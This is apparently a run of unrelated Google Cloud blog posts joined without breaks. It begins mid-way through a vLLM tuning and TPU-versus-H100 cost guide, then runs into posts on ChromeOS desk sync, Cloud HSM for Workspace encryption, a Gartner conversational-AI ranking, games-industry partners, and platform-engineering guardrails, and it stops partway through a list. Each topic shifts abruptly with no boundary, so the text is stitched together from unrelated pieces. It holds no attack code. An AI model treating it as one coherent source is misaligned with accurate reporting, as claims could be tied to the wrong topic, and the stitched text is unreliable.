```
Wait for the TPU VM to become active (status will update from PROVISIONING to ACTIVE). This might take some time depending on resource availability in the selected zone.
SSH directly into the instance with the following command:
Again, we will need to install a dependency, provide our HF_TOKEN and update our auto-tune script as we did above with the H100.
```
# Head to the main working directory
cd benchmarks/auto_tune/

# install required library
apt-get install bc

# Provide HF_TOKEN
export HF_TOKEN=XXXXXXXXXXXXXXXXXXXXX

# update auto_tune.sh with your preferred script editor and launch the auto tuner
nano auto_tune.sh
```
We will want to make the following updates to the vllm/benchmarks/auto_tune.sh file:
As our auto_tune.sh executes we determine the largest possible gpu_utilization value our server can run on and then cycle through the different num_batched_tokens parameters to determine which is most efficient.
Troubleshooting Note: It can take longer to start a vLLM engine on TPU than on GPU due to a series of required compilation steps. In some cases, this can exceed 10 minutes – and when that occurs, the auto_tune.sh script may kill the process. If this happens, update the start_server() function so that the for loop sleeps for 30 seconds rather than 10 seconds, as shown here:
```
start_server() {

  ...

  for i in {1..60}; do
    RESPONSE=$(curl -s -X GET "http://0.0.0.0:8004/health" -w "%{http_code}" -o /dev/stdout)
    STATUS_CODE=$(echo "$RESPONSE" | tail -n 1)
    if [[ "$STATUS_CODE" -eq 200 ]]; then
      server_started=1
      break
    else
      sleep 10  # UPDATE TO 30 IF VLLM ENGINE START TAKES TOO LONG
    fi
  done
  if (( ! server_started )); then
    echo "server did not start within 10 minutes. Please check server log at $vllm_log".
    return 1
  else
    return 0
  fi
}
```
The outputs are printed as the program executes, and we can also find them in log files at $BASE/auto-benchmark/$TAG. We can see in these logs that our current configurations are still able to achieve our latency requirements.
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 9
This is the final input from the script’s loop. It means your script determined that sending 9 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 10 req/s, the latency was too high.
e2el: 8423.40
This is the P99 latency that was measured when the server was being hit with 9 req/s. Since 8423.40 is less than 10,000, the script accepted this as a successful run.
throughput: 5.63
This is the actual, measured output. Even though you were sending requests at a rate of 9 per second, the server could only successfully process them at a rate of 5.63 per second.
Calculating Performance-Cost Ratio
Now that we have tuned and benchmarked our two primary accelerator candidates, we can bring the data together to make a final, cost-based decision. The goal is to find the most economical configuration that can meet our workload requirement of 100 requests per second while staying under our P99 end-to-end latency limit of 10,000 ms.
We will analyze the cost to meet our 100 req/s target using the best-performing configuration for both the H100 GPU and the TPU v6e.
NVIDIA H100 80GB (a3-highgpu-1g)
Measured Throughput: The benchmark showed a single H100 vLLM engine achieved a throughput of 4.17 req/s.
Instances Required: To meet our 100 req/s goal, we would need to run multiple instances. The calculation is: 100 req/s ÷ 4.17 req/s per instance ≈ 23.98 instances.
Since we can’t provision a fraction of an instance, we must round up to 24 instances.
Estimated Cost: As of July 2025, the spot price for an a3-highgpu-1g machine type in us-central1 is approximately $2.25 per hour. The total hourly cost for our cluster would be: 24 instances × $2.25/hr = $54.00/hr
Note: We are using Spot instance pricing for simple cost figures; this would not be a typical provisioning pattern for this type of workload.
Google Cloud TPU v6e (v6e-4)
Measured Throughput: The benchmark showed a single v6e-4 vLLM engine achieved a higher throughput of 5.63 req/s.
Instances Required: We perform the same calculation for the TPU cluster: 100 req/s ÷ 5.63 req/s per instance ≈ 17.76 instances.
Again, we must round up to 18 instances to strictly meet the 100 req/s requirement.
Estimated Cost: As of July 2025, the spot price for a v6e-4 queued resource in us-central1 is approximately $0.56 per chip per hour. The total hourly cost for this cluster would be:
18 instances × 4 chips x $0.56/hr = $40.32/hr
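The sizing and cost arithmetic for both options can be reproduced in a few lines; the throughputs and spot prices are simply the figures quoted above.

```
# Reproduce the sizing and cost figures above from the measured throughputs.
import math

TARGET_RPS = 100
HOURS_PER_MONTH = 730

options = {
    # name: (measured req/s per instance, spot $ per instance-hour)
    "H100 (a3-highgpu-1g)": (4.17, 2.25),
    "TPU v6e-4": (5.63, 4 * 0.56),
}

for name, (rps_per_instance, hourly_cost) in options.items():
    instances = math.ceil(TARGET_RPS / rps_per_instance)  # 24 for H100, 18 for v6e-4
    cluster_hourly = instances * hourly_cost              # $54.00/hr vs. $40.32/hr
    monthly = cluster_hourly * HOURS_PER_MONTH            # ~$39,400 vs. ~$29,400
    print(f"{name}: {instances} instances, ${cluster_hourly:.2f}/hr, ~${monthly:,.0f}/month")
```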
Conclusion: The Most Cost-Effective Choice
Let’s summarize our findings in a table to make the comparison clear.
| Metric | H100 (a3-highgpu-1g) | TPU (v6e-4) |
| --- | --- | --- |
| Throughput per Instance | 4.17 req/s | 5.63 req/s |
| Instances Needed (100 req/s) | 24 | 18 |
| Spot Instance Cost Per Hour | $2.25 / hour | $0.56 x 4 chips = $2.24 / hour |
| Spot Cost Total | $54.00 / hour | $40.32 / hour |
| Total Monthly Cost (730h) | ~ $39,400 | ~ $29,400 |
The results are definitive. For this specific workload (serving the gemma-3-27b-it model with long contexts), the v6e-4 configuration is the winner.
Not only does the v6e-4 instance provide higher throughput than the a3-highgpu-1g instance, but it does so at a significantly reduced cost. This translates to massive savings at higher scales.
Looking at the performance per dollar, the advantage is clear:
H100: 4.17 req/s per instance ÷ $2.25/hr ≈ 1.85 req/s per dollar-hour
TPU v6e-4: 5.63 req/s per instance ÷ $2.24/hr ≈ 2.51 req/s per dollar-hour
The v6e-4 configuration delivers roughly 35% more performance for every dollar spent, making it the superior, more efficient choice for deploying this workload.
Final Reminder
This benchmarking and tuning process demonstrates the critical importance of evaluating different hardware options to find the optimal balance of performance and cost for your specific AI workload. We need to keep the following in mind when sizing these workloads:
If our workload changed (e.g., input length, output length, prefix-caching percentage, or our requirements) the outcome of this guide may be different – H100 could outperform v6e in several scenarios depending on the workload.
If we considered the other possible accelerators mentioned above, we may find a more cost effective approach that meets our requirements.
Finally, we covered a relatively small parameter space in our auto_tune.sh script for this example – if we had searched a larger space, we may have found a configuration with even greater cost-savings potential.
Additional Resources
The following is a collection of additional resources to help you complete the guide and better understand the concepts described.
For many workers, the frequent need to switch between devices can become cumbersome and disruptive. Otherwise simple tasks like logging in, reopening applications, and re-establishing your workspace end up consuming valuable time when done many times throughout the day. To address this challenge, we’re happy to introduce ChromeOS desk sync. This feature allows users to pick up right where they left off, moving from one ChromeOS device to another and seamlessly resuming their work. All open windows, tabs, applications, and user profile settings, along with authentication into different web services, are automatically transferred across devices.
Supporting frontline workers across industries
Across any industry, but especially frontline use cases like retail, hospitality, healthcare, and manufacturing, desk sync is a practical addition to support worker productivity.
In retail and hospitality, desk sync helps streamline operations during shift changes and improve customer interactions. Associates can pick up a new device at the start of their shift and immediately access their work, whether for inventory management, team communication, sales, and more, to better facilitate shift changes. Front desk staff can immediately access guest reservations, check-in systems, and service requests through any available device at the reception desk and continue right where they left off, making guest experiences smoother as well. This instant access allows employees to focus on providing a more consistent service, reducing wait times and improving customer experiences in the process. Even more, new employees may find it easier to adapt to shared device environments, as their familiar workspace can follow them and reduce setup times across devices.
Take a look at Village Hotel Club, who uses desk sync to share devices between hotel employees. At every hotel’s leisure center, two Chromebooks are available to share, which allows employees to take a ChromeOS device with them as they walk prospective members through their facilities, and then complete applications directly from that same device. This means employees can count on a reliable application experience across devices, without any disruptions to their workflows that could potentially impact customer service.
ChromeOS has revolutionized the way we work and revolutionized my role as an IT manager keeping data, people, and devices safe. It has also improved collaboration to the point that I couldn’t imagine how we could work effectively without them.
Dan Morley
Head of IT Infrastructure and Service Delivery, Village Hotels
In healthcare environments, desk sync optimizes essential tasks and enhances data consistency. Healthcare professionals can effortlessly move between patient rooms, nurse stations, or any other departments where devices can’t be moved around, accessing electronic health records, diagnostic tools, and communication platforms. Having access to consistent experiences to work across also helps support data privacy by reducing opportunities for vulnerabilities, human error, and data management issues. Overall, desk sync allows healthcare staff to spend less time worrying about login procedures and system navigation, and more time on direct patient care and critical tasks.
Within manufacturing use cases, desk sync contributes to a more continuous production flow and helps support team hand-offs. Manufacturing line workers and supervisors alike can easily move between workstations, accessing real-time data, quality control applications, and dashboards without significant delays. For shift changes, teams can more easily get up and running with desk sync, reducing disruptions in operations between shifts. Ultimately, reduced time spent on device setup will lead to more efficient time spent on the production floor and better operational efficiency as a result.
Future proof your frontline
ChromeOS desk sync is a powerful tool designed to meet the needs of modern work environments. By making it easier to transition between devices, it greatly reduces downtime and disruptions commonly associated with device switching. Whether in retail environments, hospitality, healthcare, or many other industries, desk sync provides consistency across devices, and empowers employees to focus more on their productivity and delivering exceptional customer experiences. If you’d like to get started with ChromeOS desk sync today, you can view our help center page to begin your configuration.
Interested in learning more about how ChromeOS can support shared device use cases? Visit our website.
Organizations in highly-regulated sectors, such as government, defense, financial services, and healthcare, are required to meet stringent standards to safeguard sensitive data. Client-side encryption (CSE) for Google Workspace is a unique, privacy-preserving offering that keeps customer data confidential and enables the customer to be the sole arbiter of their data, helping them adhere to rigorous compliance regimes.
Google Workspace CSE adds another layer of encryption to your organization’s data — like files, emails, meetings, and events — in addition to the default encryption that Google Workspace provides. CSE can be especially beneficial for organizations that store sensitive and regulated data because it can provide:
Confidentiality for organizations working with sensitive intellectual property, healthcare records, and financial data.
Compliance support for organizations in highly-regulated industries that have ITAR and EAR requirements.
Data sovereignty for organizations that need demonstrative data control using encryption keys that can be held at a defined boundary, such as a specific geographic location or within a nation’s borders.
To help highly-regulated organizations meet their encryption key service obligation, we are now offering Cloud Hardware Security Module (HSM) for Google Workspace (CHGWS), bringing Google Cloud’s highest levels of compliance classifications to Workspace CSE customers. Cloud HSM is a highly available, scalable, and fully managed key management service operated at cloud scale, with hardware-backed keys stored in FIPS 140-2 Level 3 compliant HSMs (hardware security modules).
Available today in the U.S., and globally in the coming months, CHGWS offers a convenient, flat pricing model that makes it easy to set up and maintain.
Use Cloud HSM to help meet regulatory obligations
Cloud HSM is engineered to support cloud workloads that are subject to the most stringent security and regulatory mandates, and has undergone comprehensive audits and achieved compliance with regulations and certifications including FedRAMP High, DISA IL5, ITAR, SOC 1/2/3, and PCI DSS.
A cornerstone of Cloud HSM for Google Workspace’s security posture is its reliance on FIPS 140-2 Level 3 validated Marvell LiquidSecurity HSMs. Specifically, the service uses models CNL3560-NFBE-2.0-G and CNL3560-NFBE-3.0-G, running firmware versions 3.4 build 09. This validation level is critical, as it indicates that the cryptographic modules have met the highest standards of security for hardware and software components.
This extensive list of certifications provides strong assurance to customers in highly regulated market segments that their key management and data protection needs are met in accordance with the most demanding regulatory and compliance frameworks.
Our emphasis on comprehensive compliance can help simplify the burdens faced by these organizations, and can allow them to confidently deploy and manage their encryption keys while satisfying their legal and audit requirements.
While security and compliance are paramount, Google Cloud also recognizes the critical importance of high availability and scalability for its customers. CHGWS can help address these needs by offering a highly available and standards-compliant CSE key service that can be deployed rapidly, often in minutes.
Our rapid deployment capability, combined with inherent high availability, can help ensure that critical encryption services are always accessible, minimizing potential disruptions to operations.
How does Cloud HSM for Google Workspace work?
CHGWS can enhance privacy and compliance for Google Workspace CSE. The data is encrypted end-to-end and can only be decrypted by users who have permission to access it.
Encrypting data
Step 1: When a user creates content in Google Workspace, the CSE library generates a data encryption key (DEK) that is sent to the CHGWS service.
Step 2: The CHGWS service verifies the user’s identity using a customer-managed identity provider and Google Cloud IAM.
Step 3: The CHGWS service then encrypts the DEK using a customer-managed encryption key (CMEK) stored in Cloud HSM, and sends the encrypted DEK back. Then the CSE library encrypts the content using the DEK, and the encrypted DEK is stored with the content.
Reading encrypted data
When a user tries to access encrypted content, the process unfolds in reverse.
Step 4: First, the CSE library sends the encrypted DEK stored with the content to CHGWS service. CHGWS service verifies the user’s identity using the customer-managed identity provider.
Step 5: CHGWS service uses the CMEK stored in Cloud HSM to decrypt the DEK, and sends it back.
Step 6: The CSE library uses the decrypted DEK to decrypt the content.
All encrypt and decrypt operations that use the CMEK are performed inside the HSM; the CMEK never leaves the HSM protection boundary, ensuring that customers maintain full control over their encryption keys and data access.
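For a mental model of this flow, the following is a conceptual sketch of the envelope-encryption pattern described above. It is not the CSE library or the Cloud HSM API: hsm_wrap_dek and hsm_unwrap_dek are hypothetical stand-ins for the CMEK wrap and unwrap operations that happen inside the HSM after identity verification.

```
# Conceptual sketch of the envelope-encryption flow described above.
# This is NOT the CSE library or the Cloud HSM API: hsm_wrap_dek() and
# hsm_unwrap_dek() are hypothetical stand-ins for the CMEK wrap/unwrap
# operations performed inside the HSM (the CMEK itself never leaves the HSM).
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

def hsm_wrap_dek(dek: bytes) -> bytes:
    raise NotImplementedError  # performed by the key service / HSM with the CMEK

def hsm_unwrap_dek(wrapped_dek: bytes) -> bytes:
    raise NotImplementedError  # performed by the key service / HSM with the CMEK

def encrypt_content(plaintext: bytes) -> tuple[bytes, bytes, bytes]:
    dek = AESGCM.generate_key(bit_length=256)   # per-object data encryption key
    nonce = os.urandom(12)
    ciphertext = AESGCM(dek).encrypt(nonce, plaintext, None)
    wrapped_dek = hsm_wrap_dek(dek)             # only the wrapped DEK is stored
    return ciphertext, nonce, wrapped_dek

def decrypt_content(ciphertext: bytes, nonce: bytes, wrapped_dek: bytes) -> bytes:
    dek = hsm_unwrap_dek(wrapped_dek)           # after identity verification
    return AESGCM(dek).decrypt(nonce, ciphertext, None)
```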
Generating audit logs using Cloud Logging: As with all Google Cloud services, Cloud HSM service writes audit logs that record administrative activities and accesses in your Google Cloud resources. Audit logs help you answer “who did what, where, and when?” in your Google Cloud resources, with the same level of transparency as in on-premises environments. This is part of our comprehensive Access Transparency offering.
Enabling audit logs can help your security, auditing, and compliance entities monitor Google Cloud data and systems for possible vulnerabilities or external data misuse. You can learn more about KMS Audit Logging here.
We believe this report marks a pivotal moment for enterprise leaders, signaling a market shift where a strong vision is no longer an abstract concept but the critical indicator of a platform’s ability to move beyond simple cost-saving automation and deliver transformative business value. We believe Google’s position in this report reflects our core thesis: the future of customer engagement is not just conversational, but agentic—proactively solving problems, personalizing experiences, and creating new revenue opportunities. We see our position as a testament to Google’s AI innovation, global presence, and customer momentum that is transforming customer service operations across industries and enabling businesses to deliver exceptional customer experiences across all their engagement touchpoints and channels.
Customer Engagement Suite with Google AI is an end-to-end application that delivers exceptional self-service, agent assistance, and operational insights across customer service and engagement channels. Conversational Agents is the conversational AI platform capability within this suite that enables organizations to create and deploy multimodal, multilingual virtual agents with human-like conversational AI across multiple channels.
Forefront of innovation with Google DeepMind
A winning vision for conversational AI must be grounded in technology that can deliver on its promise. For a decade, enterprises have been promised AI that feels natural and intuitive. At Google, we’ve leveraged our extensive experience in search, natural language processing, machine learning, and voice generation to deliver cutting-edge conversational capabilities to our customers. This is not the result of a single breakthrough, but the convergence of enterprise-grade innovation in the cloud with cutting-edge innovations from Google DeepMind. We are moving the market past brittle, single-purpose chatbots by embedding multimodal models like Gemini to power our next-generation Conversational Agents. This allows businesses to move from merely reacting to customer queries to proactively understanding intent, personalizing interactions with high-fidelity voice, and resolving complex issues in a single, seamless engagement—transforming a support call from a cost center into a brand-building experience.
Building on Google DeepMind’s innovation, we have incorporated the latest Gemini capabilities into Conversational Agents including Gemini Flash, our most efficient model designed for speed and low-cost. Google DeepMind has been pushing the frontiers of audio generation with models that can create high quality, natural speech from a range of inputs, including text, tempo controls and voices. By integrating the latest technology into our speech model and transcription voice capabilities, our Agents provide enhanced emotional understanding with high definition voices for more personalized and natural interactions.
The deployment of these conversational AI innovations extends beyond the Customer Engagement Suite. Purpose-built vertical AI agents, including the Food Ordering and Automotive AI Agents, leverage these innovations to deliver exceptional conversational experiences for end customers. The industry-leading conversational search and multimodal capabilities in Google Agentspace and Vertex AI Search are enabled by Gemini.
Global momentum across conversational use cases
The multilingual and multimodal capabilities of Customer Engagement Suite with Google AI enable an always-on engagement for customers, scaling self-service across geographies and timezones with over 100 available languages and dialects. Global customers delivering real-world impact from our Conversational AI capabilities include:
Best Buy: This retailer generates conversation summaries in real time, allowing live agents to give their full attention to understanding and supporting customers, resulting in an over 60 second reduction in average call time and after-call work. They’ve also improved customer experiences by significantly reducing transfer and repeat call rates.
Definity: Adopting gen AI in its call center operations has already led this leading Canadian P&C insurance company to a 20% improvement in call handle time, a 15% productivity increase, and automated authentication for 75% of customers.
Bouygues Telecom: The virtual sales agents of this French telecom provider have handled over 50,000 conversations since their launch.
Our library of pre-built agents, industry-specific services accelerators, extensive global partner network, and compliance certifications ranging from HIPAA to FedRAMP High enable us to support customers across various industries, including some of the most highly regulated like Financial Services and Government. With built-in feedback mechanisms, data grounded in enterprise truth, and granular controls, we are committed to responsible AI and enterprise-grade security and compliance.
Riding the AI wave through a unified AI stack
AI is raising the bar for how organizations engage with customers, with speed, intelligence, and personalized support no longer a ‘nice to have’ when it comes to customer expectations. Gartner predicts that by 2028, 50% of customer service organizations will have adopted AI agents to improve customer self-service capabilities1.
Our vision is to deliver proactive, personalized customer experiences with AI that knows the user, anticipates their needs, and engages them seamlessly across every touchpoint. With our Next Generation Conversational Agents, we enable highly engaging customer experiences that deliver human-like, natural voices and a high degree of comprehension and personalization, helping AI agents adapt during conversations. The platform simplifies how AI agents are built by providing a new collaborative builder experience that uses AI to create AI agents, along with access to our continuously expanding integrations across data stores and actions.
Unlike point solutions, Customer Engagement Suite with Google AI is an end-to-end application, with Conversational Agents integrating seamlessly alongside the Agent Assist, Conversational Insights, and Google Contact Center as a Service (CCaaS) products. Customers can maximize business impact with a full contact center transformation by implementing the complete suite, or they can expedite time to value by integrating the individual Conversational AI products into their existing contact center environment. Underpinned by a purpose-built AI stack, our customers benefit from our fully integrated, supercomputing architecture specifically designed for gen AI and other AI workloads.
Next steps
We believe being positioned as a Leader in the Gartner® Magic Quadrant™ for Conversational AI Platforms underscores Google’s proven ability to deliver real business value, and we believe being positioned furthest in vision highlights Google’s AI innovation and potential to transform customer experiences with AI agents and the next generation of Customer Engagement Suite.
To download the full 2025 Gartner Magic Quadrant™ for Conversational AI Platforms report, click here.
1. Gartner, Innovation Insight: Augmenting Conversational AI Platforms With Agentic AI – Uma Challa, June 26, 2025
Gartner, Magic Quadrant for Conversational AI Platforms – Gabriele Rigon, Justin Tung, Bern Elliot, Arup Roy, Adrian Lee, Uma Challa, August 13, 2025
Disclaimer: Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Google.
GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and MAGIC QUADRANT is a registered trademark of Gartner, Inc. and/or its affiliates and are used herein with permission. All rights reserved.
The games industry is on a powerful ride, surging forward with innovation and a sharp focus on the player experience. For years, the industry’s evolution was defined by familiar IPs getting better graphics and gameplay. At Google Cloud, we believe we’re on the cusp of something far more radical — a shift on the scale of the transition from cartridges to CD-ROMs, or 2D to 3D graphics. This new era is defined by the rise of “living games,” a new form of dynamic, ever-evolving experiences powered by AI that captivate players for years.
With the global market for games surpassing $180 billion in 2024, this fundamental shift in how games are developed, played, and experienced creates an entirely new opportunity for the industry. A big part of what’s driving this shift is the transformative power of cloud computing and AI, and many cutting-edge developers and startups are already taking advantage of these advances.
Cloud platforms are now the core of a $12.9 billion ecosystem within games, with AI adoption emerging as a central growth driver. In fact, Google Cloud’s new survey, conducted by The Harris Poll, reveals just how deeply integrated AI has become: 97% of game developers agree that AI is reshaping the games industry. They already see this evolving technology as fundamentally changing how they create games and what players expect. This new technology is turning the weeks-long live-operations cycle into an instantaneous, AI-driven feedback loop that creates a game world that feels truly alive.
The vision of truly living games is no longer a distant dream; it’s a reality unfolding today. Google Cloud is helping drive this forward through the powerful combination of Google’s deep live service expertise and cutting-edge cloud and generative AI technologies.
It’s this kind of innovation that’s driving new and expanded collaborations with incredible games customers and partners, including Atlas, Embody, Ludeo, Nacon, and Nitrado. These pioneers are pushing the boundaries of what’s possible in games, from creating more immersive player experiences to accelerating game development and scaling their operations.
Atlas: AI for creating vast 3D game worlds
Atlas is an agentic 3D-content creation platform designed for professional game studios, enabling them to generate game-ready assets, environments, tools, and workflows. It focuses on production-scale workflows rather than one-off asset generation, acting as a creative assistant through its multi-agent AI system. Developers can co-create with intelligent AI agents using natural language prompts, ensuring the output is tailored to their specific technical and aesthetic goals. Atlas integrates with industry-standard pipelines like Unreal Engine, Unity, and Houdini, making it ideal for AA+ teams building complex games at scale.
“We believe AI-native games will define the next chapter in interactive entertainment,” said Ben James, chief executive officer, Atlas. “These experiences will be dynamic, personalized, and constantly evolving — and they’ll require a new creative infrastructure. Partnering with Google Cloud gives us the compute foundation and orchestration support to bring that vision to life.”
Atlas is collaborating with Google Cloud to supercharge its multi-agent AI infrastructure and accelerate the development of AI-native games. The platform is built entirely on Google Cloud’s infrastructure and uses our model orchestration tools, including Vertex AI. This provides Atlas with the robust compute foundation and orchestration support necessary to bring its vision to life, enabling a new era of dynamic, evolving interactive entertainment.
“Atlas’s ability to seamlessly integrate with our highly customized workflows has been a game changer,” said Joseph Burnette, technical director of the Innovation Technology Division at SQUARE ENIX. “By deeply understanding the nuances of our pipeline, they’ve become an invaluable partner, enabling us to deliver high-quality, performance-optimized solutions with impressive agility.”
Embody: Personalized spatial audio for unrivaled immersion
Embody is an AI technology company revolutionizing sound for games, music, and XR experiences through its Immerse AI Engine. This engine uses machine learning, 3D neural networks, and computer vision to deliver personalized spatial audio on any headphones. Simply by analyzing a short smartphone video of a player’s head and ears, Embody creates a unique sound profile for a hyper-realistic and deeply immersive experience. AI-native head tracking and adaptive EQ further enhance the audio, ensuring a consistent and top-tier sound experience across all devices.
To power these complex, real-time calculations and scale to millions of gamers, Embody relies on Google Cloud’s infrastructure. Access to massive, cost-effective GPU compute power is crucial for generating personalized audio profiles in seconds and for their continuous innovation in spatial sound. Our collaboration also allows Embody’s R&D team to rapidly prototype new ideas and ensure their technology is economically viable and globally scalable. Embody’s Immerse is already enhancing AAA titles like Call of Duty: Black Ops 6, War Zone, Final Fantasy XIV, Cyberpunk 2077, and The Witcher 3: Wild Hunt — and just announced it’s launching with Sea of Thieves.
“Sound is the emotional core of every game, and we believe it should be personal,” said Kapil Jain, chief executive officer, Embody. “With Google Cloud, we’re scaling our AI-powered sound personalization engine to meet the demand of millions of gamers around the world.”
Ludeo: Redefining game discovery with playable moments
Ludeo is the world’s first playable media platform, enabling users to instantly play game highlight clips. Unlike gameplay content consumed today — which turns the experience of playing games into passive videos — Ludeo works directly with studios and publishers to create “playable moments,” called Ludeos, that users can instantly jump into and experience themselves. They can do so whether they own the game or not, without any downloads or lengthy installs.
These Ludeo moments can be shared with a link anywhere, from social media platforms to messaging apps. Passive viewers become active participants in seconds. This helps game studios attract new players, re-engage existing ones by showcasing new content, and even lets players “try before they buy” in-game items, boosting interest and conversion.
To power this vision, Ludeo will bolster its core infrastructure with Google Cloud, using Google Kubernetes Engine (GKE) and GPUs to create a highly optimized, low-latency infrastructure that’s required for their platform. Ludeo will also aim to build the “playable YouTube,” fundamentally changing how players discover and socially engage with games, from popular AAA titles to AAs and indies.
“Google Cloud’s infrastructure strengthens the capabilities and scale of the Ludeo platform,” said Uri Levanon, vice president of business development and partnerships at Ludeo. “This powerful combination will give players the magic of instantly playing game highlights instead of just watching them, in addition to unlocking new growth opportunities for game studios.”
NACON: Accelerating game production with AI transformation
NACON stands as a prominent AA video games company and a leader in high-end games hardware, known for popular titles like RoboCop: Rogue City, Ravenswatch and Test Drive Unlimited Solar Crown. With 15 game studios under its belt, NACON is making a bold strategic pivot, embedding AI at the core of its operations, from game development to marketing.
NACON’s goal is to increase annual game launches, a move heavily reliant on streamlining processes and boosting creativity with AI. This vision encompasses everything from crafting captivating trailers and in-game cinematics to optimizing game maps for racing titles, all designed to enhance player experience and developer efficiency.
Google Cloud is NACON’s partner in this AI-driven transformation, helping NACON innovate faster and deliver unforgettable game experiences. NACON has selected Google Cloud as its preferred partner for game servers, ensuring scalable and reliable infrastructure for their diverse portfolio. They are also using Google’s Veo 3 model as a complementary tool to help produce cinematic trailers and Google’s Gemini model to support localization efforts, enabling NACON to reach new global markets more efficiently. Additionally, NACON will use Looker for deep insights into in-game analytics and player behavior, and Google Threat Intelligence to strengthen their ability to proactively secure their operations against industry threats.
“Partnering with Google Cloud marks a pivotal moment in NACON’s journey to transform game development with AI at its core,” said Alain FALC, president and chief executive officer, NACON. “Google Cloud’s cutting-edge tools empower our teams to innovate faster, streamline production, and deliver richer, more immersive experiences to gamers worldwide.”
Nitrado: Hybrid cloud scaling for flawless multiplayer gaming
Nitrado, a global leader in game server hosting, is making multiplayer game creation even easier for studios with a new capability for their orchestration solution, GameFabric. This platform acts as a unified orchestration layer, allowing game developers to seamlessly combine Nitrado’s high-performance bare metal infrastructure with the elasticity of the cloud, all managed through GameFabric.
This means studios can automatically use Google Cloud to support traffic spikes, like during a big game launch or a busy weekend. Furthermore, studios can bring games closer to their players by instantly deploying servers in new regions, using Google’s planet-scale network to ensure low-latency performance for a global audience. GameFabric can scale up or down automatically, allowing developers to focus on the player experience, not the infrastructure, and studios to keep their games running smoothly and cost-efficiently, no matter how many players jump online or where they are.
With Google Cloud as GameFabric’s preferred cloud provider, studios benefit from Google Cloud’s low-latency global network for a flawless player experience and elastic infrastructure for unlimited scalability. This partnership is built on operational tools like GKE and Agones, which are trusted for managing game servers efficiently and reliably. Plus, Google Cloud’s built-in security and reliability protect game and player data around the clock.
“GameFabric brings together bare metal and cloud in a unified orchestration layer, so studios can scale up, stay fast, and keep costs predictable,” said Raphael Stange, chief executive officer, Nitrado. “This partnership strengthens the hybrid model we’ve built to serve multiplayer studio needs.”
Bring your living games to life
The future of living games isn’t just a concept — it’s being built right now, powered by the dynamic combination of cloud and AI. We’re committed to being the foundational partner for game developers and studios of all sizes, offering the scalable infrastructure, powerful AI tools, and deep expertise needed to bring truly dynamic, immersive, and successful games to players worldwide. We’re excited to see what new experiences emerge as our customers and partners continue to push the boundaries of creativity and technology.
The promise of platform engineering is to accelerate software delivery by empowering developers with self-service capabilities. However, this must be balanced with security, compliance, and operational stability, and for this, you need robust controls. But all too frequently, people talk about “guardrails” — a term whose meaning is often ambiguous, leading to confusion, or worse, disdain. A platform with too many guardrails can feel like a maze of restrictions, turning off the very developers it is trying to recruit.
In order to build a governance framework that enables both fast and safe software delivery, we need to move beyond generic guardrails. In this article, we introduce a practical taxonomy of four distinct platform engineering concepts: golden paths to steer developers; guardrails that act as emergency stops; safety nets, which help ensure recovery from failure; and lastly, manual checkpoints and reviews, which introduce human judgment, oversight, and intervention into the application lifecycle. Once you understand the distinctions between these concepts, you’ll be better equipped to select the right tools and strategies for safely advancing your application through its lifecycle.
A modern taxonomy for platform controls
1. Golden paths: Well-paved roads that guide you
The best platforms don’t block developers; they steer them. A golden path (sometimes referred to as a paved road) is a proactive, guiding track that makes the right choice the easy choice. The goal is to accelerate development by providing pre-configured, secure, and efficient patterns that developers want to use. Golden paths aren’t about preventing bad behavior with a wall, but about encouraging good behavior via a well-paved, high-speed lane. Examples include pre-approved Terraform modules that build secure infrastructure by default, standardized CI/CD pipeline templates, or internal developer portals that offer curated, one-click services.
Here are some tools you can use when creating golden paths for developers.
2. Guardrails: The crash barriers
In platform engineering, guardrails are the hard, non-negotiable backstops designed to protect the fundamental integrity of a platform — its security, compliance, and operational stability. While low-friction golden paths guide a developer’s journey, guardrails act as the high-friction, non-negotiable last line of defense.
A guardrail is not a guide rail; its purpose is to prevent a catastrophic event, not to direct the workflow. It functions like an emergency brake, not a steering wheel. Think of it as a crash barrier that prevents a catastrophic accident — developers should rarely encounter a guardrail, and when they do, it should only be because a significant deviation from safe practice has occurred. A guardrail doesn’t consider a developer’s immediate goal or speed; it only cares about preventing an action that could compromise the entire system.
Prime examples of guardrails on Google Cloud include an Organization Policy that unconditionally blocks the creation of public storage buckets, or a Binary Authorization policy that rejects any container deployment whose image isn’t cryptographically signed by a trusted source.
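To make the pattern concrete, here is a minimal sketch of how a platform team might set such an organization-policy guardrail programmatically. It assumes the google-cloud-org-policy Python client library and a hypothetical project; check the exact message and field names against your library version:

# Minimal sketch: enforce the public access prevention constraint as a
# non-negotiable guardrail. The project ID is hypothetical.
from google.cloud import orgpolicy_v2

client = orgpolicy_v2.OrgPolicyClient()
parent = "projects/my-example-project"  # hypothetical project

policy = orgpolicy_v2.Policy(
    name=f"{parent}/policies/storage.publicAccessPrevention",
    spec=orgpolicy_v2.PolicySpec(
        rules=[orgpolicy_v2.PolicySpec.PolicyRule(enforce=True)]
    ),
)

# Once the policy exists, attempts to expose a bucket publicly are blocked,
# regardless of what an individual developer or pipeline tries to do.
client.create_policy(parent=parent, policy=policy)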
The following tools act as guardrails to block potentially catastrophic events.
Organization Policies: Functions as the primary service for setting non-negotiable constraints (e.g., blocking public IPs, restricting resource locations); the constraint itself is the guardrail. Organization policies establish the guardrails, and Google services provide the means to work effectively within those guardrails.
Binary Authorization: Acts as a strict, non-negotiable gatekeeper, blocking unapproved container deployments in Google Kubernetes Engine (GKE) and Cloud Run.
VPC Service Controls: Creates an impassable network perimeter to prevent data exfiltration.
IAM Conditions and Roles: Enforces strict, context-aware access controls at runtime.
Gatekeeper: Enforces non-negotiable security profiles on pods at creation time in GKE.
Container sandboxing with gVisor: Provides hard isolation between a container and the host kernel, preventing container escapes.
Vertex AI safety filters: Unconditionally blocks the generation of harmful content from AI models.
Google Cloud Firewall: A globally distributed, stateful service that allows you to enforce granular, layer 4 traffic-filtering policies for your Virtual Private Cloud (VPC) networks.
Google Cloud Armor (WAF & DDoS mitigation): Acts as a hard shield, blocking malicious web traffic and DDoS attacks before they reach the application.
